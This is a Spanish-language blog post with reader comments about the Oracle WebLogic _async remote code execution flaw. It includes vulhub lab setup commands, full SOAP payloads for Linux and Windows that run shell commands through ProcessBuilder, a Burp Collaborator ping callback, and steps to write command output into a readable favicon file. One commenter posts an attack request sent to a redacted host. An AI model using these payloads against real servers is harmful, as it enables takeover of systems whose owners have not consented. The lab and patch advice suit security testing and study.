Instalación de maquina vulnerable:
1.- sudo docker pull vulhub/weblogic
2.- sudo docker run -dit -p 7001:7001 vulhub/weblogic
Descripcion:
Oracle WebLogic Server es un middleware para implementar y administrar aplicaciones web. Un atacante podría enviar una solicitud a un servidor WebLogic, que luego se comunicaría con un host malicioso para completar la solicitud, abriendo el servidor WebLogic a un ataque RCE.
Impacto:
Los ataques exitosos de esta vulnerabilidad pueden resultar en la toma de control de Oracle WebLogic Server.
URLs Posibles:
/_async/AsyncResponseService
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceJms
Vector de ataque para Linux:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping xxx.burpcollaborator.net</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
Vector de ataque para windows:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>ping xxx.burpcollaborator.net</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
Pasos a Realizar:
Se ejecutaron pruebas de seguridad con los dos vectores de ataques para windows y linux en todos los puntos finales (URLs posibles) posibles en la aplicacion.
1.- Enviar los payloads a todos los posibles puntos finales de la aplicacion y ver si burp collaborator atrapa el ping enviado.
2.- En caso de responder y ser vulnerable, utilizar el siguiente comando entre <string>tucomando</string>
ls -la > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico
3.- Accedemos a la siguiente ruta: http://HOSTVULNERABLE/_async/favicon.ico
Solución:
Actualizar para aplicar el parche de esta vulnerabilidad.
HTTP/1.1 500 Server Error
ResponderEliminarServer: ""
Date: Mon, 17 Jun 2019 12:06:52 GMT
Content-type: text/xml; charset="utf-8"
X-Powered-By: Servlet/2.4 JSP/2.0
Connection: close
soapenv:Serverweblogic.xml.saaj.TextImpljava.lang.ClassCastException: weblogic.xml.saaj.TextImpl
Me tira este error, la petición es esta:
POST /_async/AsyncResponseService HTTP/1.1
Host: redacted
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: JSESSIONID=redacted
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 960
xx
xx
/bin/bash
-c
ping 8w59wb1i6vcf3oslmah27k8ie9k18q.burpcollaborator.net
Buff se fue a la mierda el formato del mensaje por los tags XML jajaja. Vaya fail. Gracias por el artículo de todas maneras, muy bueno.
ResponderEliminar